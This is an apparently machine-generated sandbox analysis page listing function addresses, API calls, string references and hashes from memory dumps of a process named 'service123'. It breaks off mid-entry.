Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 13bcecb6fb2cff22dad3cb54550e242cb9a42b7a18e2c49b37a4957639463273
Instruction ID: 86f8d362c3dbc4fc0b0e6b3d4b84c45eb447ab00c4aea29a27c1f055e4c589fd
Opcode Fuzzy Hash: 13bcecb6fb2cff22dad3cb54550e242cb9a42b7a18e2c49b37a4957639463273
Instruction Fuzzy Hash: 8C3139B0A093038FDB09EF2AC5487167BF5FB06718F12C25CD8998B681D335D446CBA2

Function 6CA082D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA082E5
strlen.MSVCRT ref: 6CA08333
memcpy.MSVCRT ref: 6CA08350
setlocale.MSVCRT ref: 6CA08364
setlocale.MSVCRT ref: 6CA0839A

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: f6733c19c1c9fdbe7e53242cb27c06dd8cd97c2c0b027afbff255dc381da3984
Instruction ID: d2b07074064a72ad909dea481b8d8d4b432920b3851bb936fa3366f74522347e
Opcode Fuzzy Hash: f6733c19c1c9fdbe7e53242cb27c06dd8cd97c2c0b027afbff255dc381da3984
Instruction Fuzzy Hash: AE21D0B460D3509FD340EF29D48065EFBE0AF98258F85896EE5C887701E738C9858B92

Function 6C959530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C959549
_unlock.MSVCRT ref: 6C959571
calloc.MSVCRT ref: 6C9595BF

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: a75757cafec11e3cc61675938f095b56a440dcd4813e2f117db9c0023f987775
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 55115EB15042118FEB40DF28C480796BBE4BF95344F5685A9D898CF749EB34D866CBA2

Function 6C950290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9502BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9504DE), ref: 6C9502CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9504DE), ref: 6C950300

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 42b45b99637f7447e424222e2cdb14eba2eee7545fbe683fe87c46b2780437aa
Instruction ID: 59b08bf3dfb712d644360bf774f442894d32d7eb6b08e96f76d3646e056b124d
Opcode Fuzzy Hash: 42b45b99637f7447e424222e2cdb14eba2eee7545fbe683fe87c46b2780437aa
Instruction Fuzzy Hash: 03F030B05183429BE704BF79C50832A7AB0BB5231CF918A5CE0A587A90E7348026CB62

Function 6C9552CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C954D17
(null), xrefs: 6C9552F7

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 2f7401b93a8987962c4343111126da47bffc60fb70d37b429868fa0e87a159a3
Instruction ID: 9528f70923216a3a97ce25d65578fc966c6c71dfd9294378a300682fcbdf2582
Opcode Fuzzy Hash: 2f7401b93a8987962c4343111126da47bffc60fb70d37b429868fa0e87a159a3
Instruction Fuzzy Hash: 05A1AA7160C3958BD760CF25D08039ABBE5BF85308F958A1DE8DC8B742D735D92ACB82

Function 00664BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00664C27
@, xrefs: 00664647

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 474d246cf60d5fa221e12156c905ade67d009412ae4a9775fbde336eff1cad5b
Instruction ID: 9cf169400b2a2dd3078bb4f4da79d3b300f303d522a82b32dfcccb63291e1eb1
Opcode Fuzzy Hash: 474d246cf60d5fa221e12156c905ade67d009412ae4a9775fbde336eff1cad5b
Instruction Fuzzy Hash: 37A18F7160C3918BC731DF24C0907AABBE2BF85314F148A1EE8D997342EB35D946DB82

Function 00661B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00661C6D
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00661C20
Unknown pseudo relocation protocol version %d., xrefs: 00661DF3

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: ecda0d1da3d4e3fe72a57620412020dc6e693f12f533e0a174000048af9b39ff
Instruction ID: ee580d856ed50c6eb1686b41721870630ade1861e8cdca520bba661d838a262c
Opcode Fuzzy Hash: ecda0d1da3d4e3fe72a57620412020dc6e693f12f533e0a174000048af9b39ff
Instruction Fuzzy Hash: 51818171E046059BDB10DF68D8806AEBBF3FF86340F188569D895EB354E330F8158B96

Function 6C94A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C94A9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C94A970
Unknown pseudo relocation protocol version %d., xrefs: 6C94AB43

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 56b892e1c1844ea48bd82650011666c5cbfb5535187a45ec88c265adbb9fff5c
Instruction ID: b45f1ec1803086571eb408842cd9e915c29697e0d7def6e17f30686826227f35
Opcode Fuzzy Hash: 56b892e1c1844ea48bd82650011666c5cbfb5535187a45ec88c265adbb9fff5c
Instruction Fuzzy Hash: 0171BC32A1021ACFDB00CF69D98069EB7F9FB55308F09C639D955ABB00E734E855CB91

Function 6C959128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C959142
strchr.MSVCRT ref: 6C959152
atoi.MSVCRT ref: 6C959163

Strings

., xrefs: 6C959147

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: b8cf11f93c9bdb66960a3b5094d7f6fed863ae02d05694996256ff5a05ef0caf
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: 83E08CF49047118AEB00BF3CC40839AB6E1BBA0308FC6882CD48887B00E73DC42A9762

Function 006680D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 006680F2
strchr.MSVCRT ref: 00668102
atoi.MSVCRT ref: 00668113

Strings

., xrefs: 006680F7

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 0a3eaa3a73a7d78992427c7d8b79b1c3ed35024d5f65c7c8ed5362744de741b0
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: BAE0E6B19047024FD7407F34C90631AF5D26B51300F458D6CD4C497346DB7D94469756

Function 6C959293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C95929F
GetProcAddress.KERNEL32 ref: 6C9592B3

Strings

advapi32.dll, xrefs: 6C959298
SystemFunction036, xrefs: 6C9592A8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: cdbfd53950cb3fa84faeda0f873a20d586b614a6ca2888e0c4c949c07fba44f4
Instruction ID: bd04136f878128ac220c829aa1ac391ad37fd54919bf5cbc558fc355e9f244c2
Opcode Fuzzy Hash: cdbfd53950cb3fa84faeda0f873a20d586b614a6ca2888e0c4c949c07fba44f4
Instruction Fuzzy Hash: F8E08CF2C98311CFCB00AFBC960604ABBF0BA06320F41892ED08A97600E338C456DF97

Function 6C951409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C9514D2

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 62d97cb55b474e5b0323e9c2f9660e1d80e61256db46d201f414a388b093e04c
Instruction ID: 4b7b9a9534c05cc370c58e2a78dd6c69b102bd6b21fc00b7aa40994de1494421
Opcode Fuzzy Hash: 62d97cb55b474e5b0323e9c2f9660e1d80e61256db46d201f414a388b093e04c
Instruction Fuzzy Hash: 46221F75A097408FC724CF29C084B5AFBE1BF99348F958A2EE9D897710E734E855CB42

Function 6C94A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C94A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C95C1CC), ref: 6C94A3E0
free.MSVCRT ref: 6C94A3EA

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 837b6d13b5f5e2880875bb64ff5c3eb46f38e58a3e5b4695872bc5c08a7a3bba
Instruction ID: b2ccc1938cd7610b370f222b753d180687ba424f420ca48ea94b854228400ea6
Opcode Fuzzy Hash: 837b6d13b5f5e2880875bb64ff5c3eb46f38e58a3e5b4695872bc5c08a7a3bba
Instruction Fuzzy Hash: 633172756097118BE300DF6AD48431FBBE9EFD1758F218A3CE9A447B40EB31C8458792

Function 6C9959F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C995B24
memchr.MSVCRT ref: 6C995B43

Part of subcall function 6CA082D0: setlocale.MSVCRT ref: 6CA082E5

Strings

., xrefs: 6C995B35
-, xrefs: 6C995D22

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 2e609716a6cddcb6854fe799b0d72a468d2a62d09b5dcaf76142071b075a1793
Instruction ID: f017344dda3344dad711c072997f2b335ec92fcf668160d32d0be360929d295f
Opcode Fuzzy Hash: 2e609716a6cddcb6854fe799b0d72a468d2a62d09b5dcaf76142071b075a1793
Instruction Fuzzy Hash: FCD137B0D047199FCB00DFA8C48468EBBF5BF48314F198A2AE8A4EB755D734D949CB91

Function 6C995E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C995F5E
memchr.MSVCRT ref: 6C995F7D

Part of subcall function 6CA082D0: setlocale.MSVCRT ref: 6CA082E5

Strings

6, xrefs: 6C996166
., xrefs: 6C995F6F

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 989a8e79be6eec26866a5e2b10acd93923b087c3903ff31de1609aa6599e8614
Instruction ID: 838a0671c6602d58acb72e615bd946515a15ee4ce7d228a7935db0e6c4c7fa18
Opcode Fuzzy Hash: 989a8e79be6eec26866a5e2b10acd93923b087c3903ff31de1609aa6599e8614
Instruction Fuzzy Hash: 29D147B09087599FCB00DFA8C48068EBFF0BF88354F15862AE8A4EB751D734D959CB91

Function 6CA10D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA10D85

Strings

basic_string::append, xrefs: 6CA10DFD, 6CA10E09, 6CA10EFC, 6CA10FBC

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: ec858d9e930bbe0ebe3a68fa6d8a21226c101003675f89be07c2e4445927f7e6
Instruction ID: 1830c255385f42580b6453b0418715fa6a050a08bb3cedfd8afcc9fa5cffbb20
Opcode Fuzzy Hash: ec858d9e930bbe0ebe3a68fa6d8a21226c101003675f89be07c2e4445927f7e6
Instruction Fuzzy Hash: ECA17E75A082449FCB00EF29C5C469EBBF1FF99314F04856DE8989BB44D734E899CB92

Function 6C9AB080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C9A972F), ref: 6C9AB0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C9A972F), ref: 6C9AB151
memcpy.MSVCRT(00000000,?,?,6C9A972F), ref: 6C9AB198

Strings

basic_string::assign, xrefs: 6C9AB1B3

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 27ba6189b7c3ef6a90c667b8cf21431c8c2cd1b28f04de82d56af2125618ea1d
Instruction ID: 438904e59081774dd6322160f5af78805315f6b282ccbfceca59d413eb5829af
Opcode Fuzzy Hash: 27ba6189b7c3ef6a90c667b8cf21431c8c2cd1b28f04de82d56af2125618ea1d
Instruction Fuzzy Hash: B451AD71B0A6158FD714DF69C48861EFBF5FF91308B51862DE8548BB18E731D906CB82

Function 6C9B41C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C9B4221
memcpy.MSVCRT ref: 6C9B428F
memcpy.MSVCRT ref: 6C9B42C8

Strings

basic_string::assign, xrefs: 6C9B42E4

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 0468becf0c80b3ec65804aa4dd96e6e8281e1c5de95609ebedad2f83668c96cf
Instruction ID: 5f0036280c27d4e1bab1bdfa6cf6406be8a1d5d6dfd8cf244e1e07c9c80a7b6b
Opcode Fuzzy Hash: 0468becf0c80b3ec65804aa4dd96e6e8281e1c5de95609ebedad2f83668c96cf
Instruction Fuzzy Hash: 0951B971B0A6519FDB04DF28D58461BFBF5AF92308F558A6DE4849BB18D330D805EF82

Function 6C96E730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C96E75A
wcslen.MSVCRT ref: 6C96E7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C96E792, 6C96E802, 6C96E872

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
